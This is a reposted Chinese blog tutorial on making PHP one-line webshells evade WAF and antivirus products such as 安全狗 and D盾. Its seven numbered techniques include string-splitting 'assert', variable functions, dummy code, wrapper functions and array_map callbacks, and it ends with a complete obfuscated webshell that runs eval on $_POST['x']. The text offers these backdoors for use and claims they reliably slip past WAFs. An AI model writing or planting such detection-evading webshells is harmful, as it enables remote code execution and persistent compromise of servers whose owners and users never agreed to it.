PHP一句话过狗卫士D盾等免杀思路!

Posted 可我浪费着我寒冷的年华

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP一句话过狗卫士D盾等免杀思路!相关的知识,希望对你有一定的参考价值。

原文转载于:http://www.legendsec.org/1701.html

觉得写得还算蛮科普的。

00x1.关键字拆分。
         比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

        可变变量  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
        测试结果:技术分享
        总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

        引用  比如$a=$_POST[‘x’];$b=&$a;@eval($b);
        测试结果: 技术分享

        总结:这种方法与上一种方法类似。

        可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
        测试结果: 技术分享
        总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码。

添加其他代码  比如  if(empty($a))

                                       {
                                              $a=$_POST[‘x’];
                                       }

                                        @eval($a);
        测试结果: 技术分享
        总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

        使用其他函数,比如eval可以使用assert替换。


        总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

       新定义一个函数,使其封装到新函数中。

       function test($a){   //定义一个名为test的函数,并使用$a接受参数

               eval($a);

       }

        test($_POST[‘x’]);

       测试结果: 技术分享
       总结:这种方法适合有php基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

       使用其他函数进行调用,并执行。

       如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
       测试结果: 技术分享
       总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~


00x7.利用各种方法的特性写出过WAF的一句话。
       <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>


测试结果: 技术分享

 

 

 

 

THE END


 







































以上是关于PHP一句话过狗卫士D盾等免杀思路!的主要内容,如果未能解决你的问题,请参考以下文章

无特征过狗一句话猥琐思路(代码执行)

php一句话后门过狗姿势万千之后门构造与隐藏

php一句话后门过狗姿势万千之理论篇

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

php一句话后门过狗姿势万千之传输层加工

过狗菜刀原理以及绕过魔术引号的配置